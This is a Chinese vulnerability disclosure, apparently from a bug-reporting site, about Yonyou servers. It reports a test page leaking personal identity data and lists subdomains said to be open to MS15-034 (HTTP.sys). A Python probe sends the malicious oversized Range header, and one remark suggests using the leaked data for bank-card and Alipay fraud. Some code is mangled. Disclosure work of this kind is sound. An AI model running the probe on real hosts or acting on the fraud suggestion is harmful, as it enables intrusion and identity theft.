VULHUB ™

### 简要描述： 具体泄漏信息：姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号，可以去办个银行卡以及找回支付宝密码了…… ### 详细说明： ``` http://li.yonyou.com/test.aspx ``` 具体泄漏信息：姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号 [<img src="https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png) 另外还有几个MS15-034 HTTP.sys 远程代码执行漏洞： ``` http://h.yonyou.com/ http://hr.yonyou.com/ http://q.yonyou.com/ ``` 检测POC： ``` #!/usr/bin/env python __author__ = ';jastra'; class bg_colors: VULN = ';33[92m'; NONVULN= ';33[95m'; EXPLOIT = ';33[91m'; try: import requests import re except ImportError as ierr: print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr) def identify_iis(domain): req = requests.get(str(domain)) remote_server = req.headers[';server';] if "Microsoft-IIS" in remote_server: print(bg_colors.VULN + "[+] 服务是 " + remote_server)...

### 简要描述： 具体泄漏信息：姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号，可以去办个银行卡以及找回支付宝密码了…… ### 详细说明： ``` http://li.yonyou.com/test.aspx ``` 具体泄漏信息：姓名/性别/生日/办公电话/民族/住址/身份证号/邮箱/私人电话/手机号 [<img src="https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png) 另外还有几个MS15-034 HTTP.sys 远程代码执行漏洞： ``` http://h.yonyou.com/ http://hr.yonyou.com/ http://q.yonyou.com/ ``` 检测POC： ``` #!/usr/bin/env python __author__ = ';jastra'; class bg_colors: VULN = ';33[92m'; NONVULN= ';33[95m'; EXPLOIT = ';33[91m'; try: import requests import re except ImportError as ierr: print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr) def identify_iis(domain): req = requests.get(str(domain)) remote_server = req.headers[';server';] if "Microsoft-IIS" in remote_server: print(bg_colors.VULN + "[+] 服务是 " + remote_server) ms15_034_test(str(domain)) else: print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server) def ms15_034_test(domain): print(" 启动vuln检查！") vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; req = requests.get(str(domain), params=vuln_buffer) if req.headers[';content';] == "请求范围不符合": print(bg_colors.EXPLOIT + "[+] 存在漏洞") else: print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. "+ "需要手动检测") usr_domain = raw_input("输入域名扫描: ") identify_iis(usr_domain) ``` ### 漏洞证明： 如上